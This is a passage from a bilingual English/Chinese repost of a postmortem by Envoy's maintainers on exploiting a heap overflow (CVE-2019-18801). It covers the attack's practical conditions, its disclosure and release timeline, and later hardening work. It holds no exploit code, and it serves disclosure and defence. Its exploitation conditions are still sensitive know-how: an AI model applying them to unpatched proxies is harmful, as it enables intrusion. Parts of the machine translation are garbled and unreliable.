content-length: 4
x-envoy-expected-rq-timeout-ms: 15000

We constructed a simple backend Flask Python server to be able to control timing and return the treasure. After running the above script, result_containing_the_secret_treasure has the desired treasure returned to the attacker.

我们构建了一个简单的后端Flask Python服务器，以便能够控制时间并返回宝藏。运行上述脚本后， result_containing_the_secret_treasure所需的财富返还给了攻击者。

实际影响 (Practical implications)

At this point, given the careful timing and configuration choice, it’s reasonable to question the practical application of this exploit. Here we enumerate and examine some assumptions and considerations:

在这一点上，考虑到谨慎的时间安排和配置选择，对这种漏洞的实际应用提出质疑是合理的。在这里，我们列举并研究一些假设和注意事项：

A HTTP/2 → HTTP/1 request path is a reasonably common Envoy data plane forwarding path.
HTTP / 2→HTTP / 1请求路径是合理的Envoy数据平面转发路径。
The buffer filter is one of Envoy’s core filters that features in many configurations.
缓冲区过滤器是Envoy的核心过滤器之一，具有许多配置。
Assuming a quiescent server is a little more restrictive. However, regional servers and proxies may be quiescent at night. Also, it’s only necessary to access the hidden treasure once to have a successful attack. More sophisticated heap shaping would reduce the need for this restriction. Timing requirements may also depend on the nature of the shaping; in our example they were fairly generous and easy to implement with the sleep command at second granularity.
假设静态服务器更具限制性。但是，区域服务器和代理服务器可能在晚上处于静止状态。此外，只需一次访问隐藏的宝藏即可成功攻击。更复杂的堆整形将减少对此限制的需求。时间要求也可能取决于整形的性质。在我们的示例中，它们相当大方，并且易于使用第二粒度的sleep命令来实现。
Envoy was run with — concurrency 1 to have all the requests land on the same worker thread. The attack may still work with other concurrency settings with some lower probability.
Envoy与— concurrency 1一起运行，以使所有请求都位于同一工作线程上。该攻击可能仍以较低的概率与其他并发设置一起使用。
The GET header matching was needed due to the use of /treasure in request B. We needed to avoid the rejection of request B prior to forwarding and invoking the HTTP/1 encoder. This configuration choice is unusual, but there are other highly plausible scenarios in which we wouldn’t need to do this. For example, if there were two listeners with different route configurations, where one sink holed /treasure and the other didn’t, the GET header matching would not be required.
由于在请求B中使用了/treasure ，因此需要GET标头匹配。我们需要避免在转发和调用HTTP / 1编码器之前拒绝请求B。这种配置选择是不寻常的，但是在其他非常合理的情况下，我们不需要这样做。例如，如果有两个侦听器具有不同的路由配置，其中一个接收器有Kong/treasure ，而另一个没有，则不需要GET标头匹配。
After the attack, the Envoy process had a corrupted memory allocator state. We couldn’t access the treasure again on a second replay with the same server. This increased the likelihood of detection (e.g. via core dump and analysis) and reduced the likelihood of the attack working on a noisier server.
攻击后，Envoy进程的内存分配器状态已损坏。我们无法在同一台服务器上进行第二次重放，再次访问该宝藏。这增加了检测的可能性(例如，通过核心转储和分析)，并降低了在嘈杂的服务器上进行攻击的可能性。

This attack was built from first principles and ignores a large body of work and tooling around RCE and heap attacks, since our focus was on the HTTP data plane specific aspects. It’s entirely possible that more sophisticated heap exploits for the same vulnerability, with fewer constraints and assumptions, could be developed by security researchers who specialize in these kinds of attacks. The QoD attack and cross-request interference were also potentially impactful, regardless of either RCE or access control bypass.

这种攻击是从第一原理开始的，并且忽略了围绕RCE和堆攻击的大量工作和工具，因为我们的重点是HTTP数据平面特定方面。专攻这类攻击的安全研究人员有可能开发出针对同一漏洞的更复杂的堆利用程序，而约束和假设更少。无论RCE还是访问控制旁路，QoD攻击和跨请求干扰都可能产生影响。

For the purposes of Envoy security, we were convinced by the proof-of-concept that we had a critical security vulnerability and scored this as CVSS 9.0. We engaged Envoy’s security release process and worked with the Envoy OSS security team (which we overlap with in membership) to deliver the 1.12.2 security release with the fix for this bug. The fuzzer bug was reported October 22 and the following security release occurred December 10 2019.

出于Envoy安全的目的，我们通过概念证明使我们确信我们存在严重的安全漏洞，并将其评为CVSS 9.0。我们参与了Envoy的安全发布过程，并与Envoy OSS安全团队(我们在成员资格上有重叠)合作，提供了包含此bug修复程序的1.12.2安全版本。该模糊器错误报告于10月22日，并且以下安全发布于2019年12月10日发布。

强化Envoy的数据平面 (Hardening Envoy’s data plane)

Following the security release, we conducted an audit of other uses of memcpy and C string functions across the Envoy code base, removing most of these and validating the remainder. The reason that this vulnerability existed was due to the use of manual buffer memory management, which is highly discouraged in the code base; most of Envoy works with safe C++ abstractions.

安全发布之后，我们对Envoy代码库中的memcpy和C字符串函数的其他用法进行了审核，删除了其中的大部分并验证了其余部分。存在此漏洞的原因是由于使用了手动缓冲存储器管理，因此在代码库中强烈建议不要这样做。大多数Envoy都使用安全的C ++抽象。

The HTTP/1 request encoder now uses Envoy’s standard buffer abstraction rather than its own internal memory management and pointer arithmetic.

HTTP / 1请求编码器现在使用Envoy的标准缓冲区抽象，而不是其自己的内部内存管理和指针算法。

Envoy now builds by default as a position independent executable. Any distribution with ASLR enabled will benefit from this.

现在，Envoy现在默认构建为与位置无关的可执行文件。任何启用了ASLR的发行版都将从中受益。

We have also opened issues to consider further hardening:

我们还提出了一些问题，以考虑进一步加强：

Building with the Scudo allocator for Envoys that operate in untrusted environments. The checksum features in Scudo would mitigate against simple overrun attacks. See https://github.com/envoyproxy/envoy/issues/9365.
使用Scudo分配器为在不受信任的环境中运行的Envoy构建。 Scudo中的校验和功能可以缓解简单的溢出攻击。参见https://github.com/envoyproxy/envoy/issues/9365
Where there is a tradeoff between performance and security, providing a secure build and runtime profile is desirable. For example, it would be possible to enable runtime bounds checks on STL containers in a secure build mode. This is tracked in https://github.com/envoyproxy/envoy/issues/9087.
如果需要在性能和安全性之间进行权衡，则需要提供安全的构建和运行时配置文件。例如，可以在安全的构建模式下对STL容器启用运行时边界检查。这在https://github.com/envoyproxy/envoy/issues/9087中进行了跟踪。
We have an open issue to eliminate the remaining uses of memcpy, see https://github.com/envoyproxy/envoy/issues/9328.
我们有一个公开的问题来消除memcpy的其余用途，请参阅https://github.com/envoyproxy/envoy/issues/9328 。

Heap vulnerabilities exploitable from untrusted client traffic are rare but potentially highly impactful. These black swans need to be taken seriously by those who develop and operate any networking infrastructure implemented in languages where memory safety is not guaranteed. This article has provided a case study in how Google’s Envoy Platform team went about discovering and mitigating the only demonstrated remote exploit of this variety to date in the Envoy proxy. We look forward to continuing to harden Envoy to structurally prevent this class of vulnerabilities.

不受信任的客户端流量可利用的堆漏洞很少见，但潜在影响很大。开发和操作以无法保证内存安全性的语言实现的任何网络基础结构的人员都必须认真对待这些黑天鹅。本文提供了一个案例研究，说明了Google的Envoy平台团队如何在Envoy代理中发现和缓解迄今为止唯一证实的该品种的远程利用。我们期望继续加强Envoy的结构，以防止此类漏洞。

Acknowledgements: Original triage and investigation for the CVE was supported by Matt Klein, the Google Envoy Platform team and Google ISE team. The ClusterFuzz infrastructure helped discover the ASSERT violation and generated the initial fuzz report (built on Oss-Fuzz). Thanks to reviewers of drafts of this document who contributed a number of improvements, including Joshua Marantz, Stewart Reichling, Felix Gröbert, Christoph Kern and Joshua Blatt. Yan Avlasov led the Envoy OSS fix efforts for CVE-2019–18801, resulting in the Envoy 1.12.2 release. Dan Noé contributed a number of low-level C function cleanups to Envoy in the wake of the security release.

致谢：马特·克莱因(Matt Klein)，Google Envoy平台团队和Google ISE团队支持对CVE进行原始分类和调查。 该 ClusterFuzz 帮助基础设施发现ASSERT违例和生成的初始绒毛报告(建于 OSS-发子 )。 感谢本文档草稿的审阅者，他们为Joshua Marantz，Stewart Reichling，FelixGröbert，Christoph Kern和Joshua Blatt做出了许多改进。 Yan Avlasov领导了Envoy OSS的 CVE-2019-18801 修复工作 ，并发布 了Envoy 1.12.2 。安全发行版发布后，DanNoé向Envoy贡献了许多低级C函数清理。

Disclaimer: The opinions stated here are my own, not those of my company (Google).

免责声明：此处陈述的观点仅属于我个人，而非我公司(Google)的观点。

翻译自: https://blog.envoyproxy.io/exploiting-an-envoy-heap-vulnerability-96173d41792